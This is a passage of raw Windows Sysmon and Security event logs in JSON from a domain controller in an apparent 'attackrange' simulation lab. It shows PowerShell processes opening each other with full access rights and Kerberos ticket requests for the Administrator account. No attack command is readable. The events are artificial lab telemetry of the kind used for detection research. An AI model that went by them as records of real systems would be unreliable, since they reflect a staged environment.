QQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4391,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-0010AE650600}\r\nSourceProcessId: 2176\r\nSourceThreadId: 5072\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66f32ed9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6639481a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f2ce9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d61df(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663c8164(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d4697(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d428a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663baae5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663ba0b5(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-0010AE650600}","SourceProcessId":"2176","SourceThreadId":"5072","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010A2710600}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66f32ed9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6639481a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f2ce9(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d634e(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d61df(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663c8164(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d4697(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d428a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3fb3(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663d3c84(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e85099(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663baae5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663ba0b5(wow64)","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4392,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010A2710600}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010A2710600}","TargetProcessId":"1632","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4393,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4394,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4395,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4396,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.189\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.189","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220454,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220455,"ProcessID":864,"ThreadID":420,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{8325D2E2-F565-F530-B8F0-304DFF73B4A1}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 